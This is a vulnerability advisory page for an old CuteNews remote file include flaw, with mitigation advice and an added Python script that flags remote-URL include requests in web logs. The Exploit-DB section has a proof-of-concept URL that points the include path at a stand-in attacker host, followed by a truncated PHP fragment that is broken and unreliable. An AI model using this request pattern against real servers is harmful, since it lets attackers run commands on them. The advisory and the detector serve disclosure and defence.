Vendor: CuteNews
By: SecurityFocus
CVSS: 7.5 HIGH
Remote File Include
CWE: 98
Product Name: CuteNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:cutephp:cutenews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

CuteNews Remote File Include Vulnerability

Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

Mitigation:

Validate user-supplied input before it is used to build an include path, and restrict the types of files that can be included, so that the application is not vulnerable to remote file inclusion attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6935/info
  
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
  
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
  
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/cutenews/comments.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
  
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
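
A log check for the request shape shown above, where the include-path parameter (cutepath) carries a remote URL. This is an added example, not code from the advisory or from CuteNews; the log lines, addresses and host names are constructed, and the function and constant names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# URL schemes that PHP's include can fetch from a remote server.
REMOTE_URL = re.compile(r"\s*(?:https?|ftps?)://", re.IGNORECASE)
# Parameter named on this page; extend per application (assumption).
INCLUDE_PARAMS = frozenset({"cutepath"})


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253A -> %3A -> ':' is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_remote_include_requests(log_lines, params=INCLUDE_PARAMS):
    """Return (line_no, client, param, value) for each flagged request."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        query = urlsplit(match.group("target")).query
        # parse_qsl decodes once; fully_decode handles double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if name in params and REMOTE_URL.match(value):
                hits.append((line_no, line.split()[0], name, value))
    return hits


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cutenews/comments.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cutenews/comments.php?cutepath=http://remote.example/config.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cutenews/comments.php?cutepath=hTTp%253A%252F%252Fremote.example%252Fconfig.php HTTP/1.1" 200 310',
    '192.0.2.22 - - [01/Jan/2024:10:01:00 +0000] "GET /cutenews/search.php?story=http://news.example/item HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in find_remote_include_requests(SAMPLE_LOG):
        print(hit)
```

The fourth sample line is not flagged because its parameter is not in the watched set; pass a wider params set to cover other include-path parameters in the application being monitored.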